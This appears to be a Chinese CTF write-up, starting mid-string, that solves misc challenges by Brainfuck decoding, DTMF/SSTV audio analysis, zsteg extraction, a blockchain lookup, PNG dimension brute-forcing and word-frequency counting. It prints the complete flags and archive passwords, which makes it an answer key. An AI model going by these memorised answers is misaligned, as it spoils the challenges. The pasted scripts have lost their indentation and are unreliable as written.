TVEJTNFLS4lMjAtLS0uJTJCJTBBJTIwJTJCJTJCJTJCJTJCJTJCJTIwLi0tLS0lMjAtLiUyQiUyQi4lMjAlMkIlMkIuJTJCLiUwQS0tLi0tJTIwLiUzQyUyQiUyQiUyQiUyMCUyQiU1Qi0lM0UlMkIlMjAlMkIlMkIlMkIlM0MlNUQlMjAlM0UlMkIlMkIuJTNDJTIwJTJCJTJCJTJCJTJCJTVCJTIwLSUzRS0tLSUyMC0lM0MlNUQlM0UtJTIwJTBBLiUyQi4tLiUyMC0tLS4lMkIlMjAlMkIlMkIuJTJCLiUyMC0uJTJCJTJCJTJCJTBBJTJCLi0tLSUyMC0tLiUzQyUyQiUyMCUyQiUyQiUyQiU1Qi0lMjAlM0UlMkIlMkIlMkIlMkIlMjAlM0MlNUQlM0UlMkIlMkIlMjAuJTNDJTJCJTJCJTJCJTIwJTVCLSUzRS0tJTIwLSUzQyU1RCUzRS0lMjAtLS0tLiUyMC0tLS0uJTIwJTJCLiUyQiUyQiUyQiUyMCUyQi4tLS0lMEEtLi0tLSUyMC4lMkIlMkIlMkIuJTIwLS4uJTNDJTJCJTIwJTJCJTJCJTJCJTVCLSUyMCUzRSUyQiUyQiUyQiUyQiUyMCUzQyU1RCUzRSUyQiUyQiUyMCUwQS4lM0MlMkIlMkIlMkIlMjAlMkIlNUItJTNFLSUyMC0tLSUzQyU1RCUyMCUzRS0uJTJCJTJCJTIwJTJCJTJCJTJCLi0lMjAtLS0tLiUwQSUyQiUyQiUyQi4uJTIwLS0tLiUyQiUyMCUyQiUyQi4tLSUyMC0tLiUyQi4lMjAuLiUyQiUyQiUyQiUyMCUyQi4tLi0lMjAtLS0tLiUyMCUyQiUyQiUyQiUyQiUyQiUyMCUwQS4tLS0tJTIwLiUyQi4lMkIlMkIlMjAlMkIlMkIuLS0lMjAtLS4lMkIlMkIlMEElMkIlMkIuLS4lMjAtLS0tLiUyMCUyQi4tLiUyQiUyMCUyQiUyQiUyQiUyQi4lMjAlMEElM0MlMkIlMkIlMkIlNUIlMjAtJTNFJTJCJTJCJTJCJTIwJTNDJTVEJTNFJTJCJTJCJTIwJTJCJTJCLiUzQyUwQSUzQyUyRnAlM0UlMEElM0MlMkZib2R5JTNFJTBBJTNDJTJGYm9keSUzRSUwQSUyMCUyMCUzQyUyRmh0bWwlM0UlMEEnKSk7PC9zY3JpcHQ+Cg==
base64解码获得
+++++ ++[-> +++++ ++<]> +++.. ++.-. ++.-- --.++ ++.--
-.-.- --.++ ++++.
+.--- -..++ ++.<+ ++[-> +++<] >++.< +++[-
>---< ]>--- ---.+ ++++. -----
.+++. ...-- ---.+ ++++. ---.+ ++.-- ---.+ ++++. ---.. +++++ +.--- ----.
<++++ [->++ ++<]> ++.<+ +++[- >---- <]>-. ---.+
+++++ .---- -.++. ++.+.
--.-- .<+++ +[->+ +++<] >++.< ++++[ ->--- -<]>-
.+.-. ---.+ ++.+. -.+++
+.--- --.<+ +++[- >++++ <]>++ .<+++ [->-- -<]>- ----. ----. +.+++ +.---
-.--- .+++. -..<+ +++[- >++++ <]>++
.<+++ +[->- ---<] >-.++ +++.- ----.
+++.. ---.+ ++.-- --.+. ..+++ +.-.- ----. +++++
.---- .+.++ ++.-- --.++
++.-. ----. +.-.+ ++++.
<+++[ ->+++ <]>++ ++.<
Brainfuck加密https://www.splitbrain.org/services/ook
EasyWorld
额,查到了原题https://www.icode9.com/content-4-961968.html
压缩包密码没改为:2zhlmcl,1hblsqt.
,直接打开获得flag即可
4096
俩端拨号键,中间sstv传输
使用Audacity把中间那一段删除提取拨号键
DTMF拨号键:
http://dialabc.com/sound/detect/index.html
号码是:13879085947
sstv传输
MD5(cell phone number),压缩包密码为:32fc1b5487cb447f792a19418b92544e
获得图片,使用gaps进行拼接
gaps --image=part_flag.jpg --size=64
拼接测试为:RGVzdDBnM3tlZDRkMTE0Zi05ZWU0LQ==
第一段:Dest0g3{ed4d114f-9ee4-
/js/local_storage_manager.js文件中有
Congratulations, this is part of the flag: NGVlNy1iNjczLTk3MWQ4MWY4YjE3N30=.
Dest0g3{ed4d114f-9ee4-4ee7-b673-971d81f8b177}
Python_jail
疑似摩斯密码,Ctrl+H替换后解密
得到:a8e15220-7404-4269-812e-6418557b7dc2
解压后获得图片,使用zsteg看一下lsb
有个pyc文件,提取出来
zsteg -E "b1,rgb,lsb,xy" SECRET1.png > SECRET1.pyc
然后拖到网站上反编译一下获得
#!/usr/bin/env python
# visit https://tool.lu/pyc/ for more information
# Version: Python 3.9
file = open('\xe7\xa6\x8f\xe6\x9d\xa5\xe9\x98\x81.txt', 'w')
file.write('\xe7\xa6\x8f\xe6\x9d\xa5\xe9\x98\x81\xe5\x9c\xa8\xe8\xbf\x99\xe9\x87\x8cZmxhZ3tiNWJjZmM4Ny01Y2E2LTQzZjEtYjM4NC01N2QwOWI4ODZjYTl9')
print('\xe7\x94\x9f\xe6\x88\x90\xe6\x88\x90\xe5\x8a\x9f\nFind it in your folder')
很明显的base64解码得到flag:
ZmxhZ3tiNWJjZmM4Ny01Y2E2LTQzZjEtYjM4NC01N2QwOWI4ODZjYTl9
flag{b5bcfc87-5ca6-43f1-b384-57d09b886ca9}
BLOCKCHAIN
Where the flag?
啥也不会,打开里边的链接:https://ropsten.etherscan.io/address/0x78f2b5695e5e6e51fc0fd6d7e0caaa05190af9cc
在最后一条成功交易内有flag
Ai
ORC
import binascii
import struct
import sys
file = input("图片地址:")
fr = open(file,'rb').read()
data = bytearray(fr[0x0c:0x1d])
crc32key = eval('0x'+str(binascii.b2a_hex(fr[0x1d:0x21]))[2:-1])
#原来的代码: crc32key = eval(str(fr[29:33]).replace('\\x','').replace("b'",'0x').replace("'",''))
n = 4095
for w in range(n):
width = bytearray(struct.pack('>i', w))
for h in range(n):
height = bytearray(struct.pack('>i', h))
for x in range(4):
data[x+4] = width[x]
data[x+8] = height[x]
crc32result = binascii.crc32(data) & 0xffffffff
if crc32result == crc32key:
print(width,height)
newpic = bytearray(fr)
for x in range(4):
newpic[x+16] = width[x]
newpic[x+20] = height[x]
fw = open(file+'.png','wb')
fw.write(newpic)
fw.close
sys.exit()
用这个脚本爆破宽高,获得如下图片
然后找个ORC文字识别
377ABCAF271C000451FCF397500200000000000062000000000000001D9C97C8E004D002485D0022194A676D2FDE351A055C168F9710364AE2D581126E378F3B4C47E15E2E80B74234B849430A221F40C086E06B24ADAAC47F32CB62CADD154B50723E65E50CDF99CC2B953916AD2204D70C15FB493BD4C2E1F93902FB3563190ACEE58CC01621BB2AAAB6EED8CE892FEF5F0927E2C4BCD7C188277D09D0357995A2FB65D31CD99C853D7BAF52EAD8555920D1672B4A3B713917E98FB324AD225A3FA2AFAC1435FFE31ED0C0CEF0CA0B68C0CCCA81C458680D7C75139429D282984933F7ACFDFB127321D9F4EFC0FEAAE92F985D3C457E90AFBC4DA9D11B23E507A0953036A2EC1D75D69CD1F6A9F0790B1AB02D6C2AFFDF66A2E7E56A1070FBCD316813E12DF9E26FC4813D419792A65960D4D97EDFA7A978A0385C04CF36EFDE3B07DF9B9405253EAA838149910F2571FAA4A8E085D1567C5C17C9B3400F91FBFE6B47E052BA07097C9D77803D3A45E3477FE324603179C7CA6A128CDC0F7E834812618AD4C79934226637E9300C5595E355139A2ECF661A5F63750A6A0035ACF52417AF3A1C1FEA14471D074C27F81C719D98717F4ECD32918BD15C18AB93769E94DDEFD3B6FAF4DDD6628BA44BDEF574FCCD5589334EA8063D7B27A2F0600FC864D010A7F0CEC9B9395434878D01943887194342F9D34FC8F12DD4556ED5A5A36667F9319A0395DB9A445B94C44771B406F962B1CFC8535BA0D3EE3DDDEB876C95092AAB192B168A732F3A7B9E8156C403C583983F5527A0D6C5D6928481D56955474046D9FC17A2DE21F3D6FC4C69644E7C6A141BE948A417A33D62C6FF6DFAC702A0FC101748D9A9C64A6A0000010406000109825000070B010001212101000C84D100080A0196EAFE6000000501190A0000000000000000000011190044006500730074003000670033002E00740078007400000019020000140A0100B547E05F6654D8011506010020000000000000
377a bcaf开头是个7z压缩包,里边有flag
RGVzdDBnM3szNDUxMjA5OC0zMzA5LTc3MTItODg2NS03ODM0NjAyMjE2NDd9
Dest0g3{34512098-3309-7712-8865-783460221647}
The correct flag
将docx里边的东西放出来
然后进行词频分析,查找出现最多的单词,然后拼接
先查找D开头的单词,出现最多的为De,然后查找e开头,以此类推,上exp
f = open('content.txt', 'r')
contents = f.read()
list_content = contents.split(' ')
# print(len(list_content))
dic_words = {}
for content in list_content:
if content not in dic_words.keys():
dic_words[content] = 0
else:
dic_words[content] += 1
# print(dic_words['87'])
word = "D"
flag = 'D'
wr = ''
while True:
max = 0
for key, value in dic_words.items():
for key, value in dic_words.items():
if key[0] == word:
if value > max:
max = value
wr = key
print(max)
word = wr[1]
flag += word
print(flag)
if word == '}':
break
